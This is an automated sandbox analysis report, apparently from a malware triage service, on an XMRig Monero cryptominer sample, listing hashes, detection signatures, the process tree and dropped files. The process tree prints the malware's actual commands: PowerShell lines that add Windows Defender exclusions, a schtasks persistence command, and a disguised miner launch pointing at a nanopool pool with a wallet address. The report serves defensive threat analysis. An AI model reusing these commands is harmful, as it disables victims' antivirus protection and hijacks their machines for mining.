Analysis

  • max time kernel
    88s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-07-2023 13:30

General

  • Target

    file.exe

  • Size

    2.5MB

  • MD5

    f339ecfb8d74dc53102ca10d1b34b307

  • SHA1

    ad11d6129270cbe9f681a9dba78134ca2b451bd7

  • SHA256

    6c649c5633d1b3b8832e1b5c13b176482179f38cfb021a5f81e22757788c72b0

  • SHA512

    7fac9c54e9fe794d0f80be4eb724f2ef9735e1fb2f3a9590cc67ac8f3cec9259422dc4f99fd225c0395641a92d6d0b21a0ae4875b30632dfe0b4c6d0cfa96b70

  • SSDEEP

    24576:Fq3yIhAzArEu+epp7T6km+Q+VuhHQDaEFRGocQngdHdq/UN3RZ7T:FuELLer1m+QZwDZRGXQngdHd5NRZ

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB0AD.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3216
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:688
      • C:\ProgramData\CodeShorts\ELRX.exe
        "C:\ProgramData\CodeShorts\ELRX.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4600
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4688
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
            5⤵
            • Creates scheduled task(s)
            PID:3552
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
          4⤵
            PID:4000

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\CodeShorts\ELRX.exe

      Filesize

      532.3MB

      MD5

      08e53509fff20c6da670da8fa7ff600a

      SHA1

      c89266620633541f75aa39c774e5006dc2038964

      SHA256

      fba770414303f7a678dd76d12185ddfbad9064c665f0b5450cac8130f0dd5b59

      SHA512

      0bfa642d358433b4fba930ae5896db84b03177f13f15769a60a0da71722f0742f8d7bb9b668101ba4abd6d0a24bd167bf589f4525fb524c6e976d0825b102fb3

    • C:\ProgramData\CodeShorts\ELRX.exe

      Filesize

      538.8MB

      MD5

      f16f56c84624a9bd9ab9e19627206fb6

      SHA1

      f6729db8a88f96cafe251b3c601f1192c9e2ff54

      SHA256

      7290915d25dc9c4d1aa20965567a01bfc4d72234d9087414eb52942d4cfeaf39

      SHA512

      65e21c2729e50c56b7987ae2298d119e7191639e630f8077c0db733b06b003cdb6efcef1fe29e5f78aa7699d6d97eccef88510686178ce7d5006d62cd57b3bc2

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      cadef9abd087803c630df65264a6c81c

      SHA1

      babbf3636c347c8727c35f3eef2ee643dbcc4bd2

      SHA256

      cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

      SHA512

      7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      cadef9abd087803c630df65264a6c81c

      SHA1

      babbf3636c347c8727c35f3eef2ee643dbcc4bd2

      SHA256

      cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

      SHA512

      7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      3505effaead0f06d098f1aec01836881

      SHA1

      94bafdbeb2f5adbd8cec709574df5b8dbcc5eba3

      SHA256

      5d39a25ff8842c7c14aa14f99c5e3e1606fb7516c57f03dc41069df3c3de0517

      SHA512

      934d8eab5bc2ec20e800c668f3c3434829feade4771918a22d712f7ba39f91f93877a1e9dc1beac966646af0c9dd2cf118041535143b3abc585fea8dfb1299f5

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5b50un0k.55m.psm1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmpB0AD.tmp.bat

      Filesize

      143B

      MD5

      c7a642b1477f25c106aca6cd541e8aa0

      SHA1

      01f4e358c537684138916b79444770717f3ae556

      SHA256

      3c9cfe71f8e0f5138521c298b21f33a1f275dbac45e62d53406d533f6e55ae54

      SHA512

      390c17fb9d77d7e3055792b0e44b57e1bbf18cf5553495ffb5266798ea2c10d374d64f97f700b1afdceea6c67b98449dfe8665d0d2fe1e064530acadebedd166

    • memory/2044-163-0x000001CB212B0000-0x000001CB212C0000-memory.dmp

      Filesize

      64KB

    • memory/2044-142-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/2044-141-0x000001CB212B0000-0x000001CB212C0000-memory.dmp

      Filesize

      64KB

    • memory/2044-165-0x000001CB212B0000-0x000001CB212C0000-memory.dmp

      Filesize

      64KB

    • memory/2044-168-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/2380-162-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/2380-133-0x00000000004E0000-0x0000000000762000-memory.dmp

      Filesize

      2.5MB

    • memory/2380-136-0x00000000028D0000-0x00000000028D1000-memory.dmp

      Filesize

      4KB

    • memory/2380-135-0x000000001B470000-0x000000001B480000-memory.dmp

      Filesize

      64KB

    • memory/2380-134-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/2380-180-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/2380-173-0x000000001B470000-0x000000001B480000-memory.dmp

      Filesize

      64KB

    • memory/2744-139-0x000002065E9D0000-0x000002065E9E0000-memory.dmp

      Filesize

      64KB

    • memory/2744-172-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/2744-164-0x000002065E9D0000-0x000002065E9E0000-memory.dmp

      Filesize

      64KB

    • memory/2744-153-0x0000020646640000-0x0000020646662000-memory.dmp

      Filesize

      136KB

    • memory/2744-140-0x000002065E9D0000-0x000002065E9E0000-memory.dmp

      Filesize

      64KB

    • memory/2744-138-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/3740-186-0x0000000002B60000-0x0000000002B61000-memory.dmp

      Filesize

      4KB

    • memory/3740-185-0x000000001B700000-0x000000001B710000-memory.dmp

      Filesize

      64KB

    • memory/3740-243-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/3740-187-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/3740-184-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/3740-213-0x000000001B700000-0x000000001B710000-memory.dmp

      Filesize

      64KB

    • memory/4000-230-0x000002099DD10000-0x000002099DD30000-memory.dmp

      Filesize

      128KB

    • memory/4000-233-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-237-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-236-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-235-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-234-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-232-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-231-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-229-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-228-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4000-227-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4340-223-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/4340-189-0x000001E870E60000-0x000001E870E70000-memory.dmp

      Filesize

      64KB

    • memory/4340-190-0x000001E870E60000-0x000001E870E70000-memory.dmp

      Filesize

      64KB

    • memory/4340-218-0x000001E870E60000-0x000001E870E70000-memory.dmp

      Filesize

      64KB

    • memory/4340-188-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/4600-222-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/4600-202-0x00007FF843240000-0x00007FF843D01000-memory.dmp

      Filesize

      10.8MB

    • memory/4600-217-0x00000268B8A30000-0x00000268B8A40000-memory.dmp

      Filesize

      64KB

    • memory/4600-214-0x00000268B8A30000-0x00000268B8A40000-memory.dmp

      Filesize

      64KB

    • memory/4600-191-0x00000268B8A30000-0x00000268B8A40000-memory.dmp

      Filesize

      64KB

    • memory/4600-192-0x00000268B8A30000-0x00000268B8A40000-memory.dmp

      Filesize

      64KB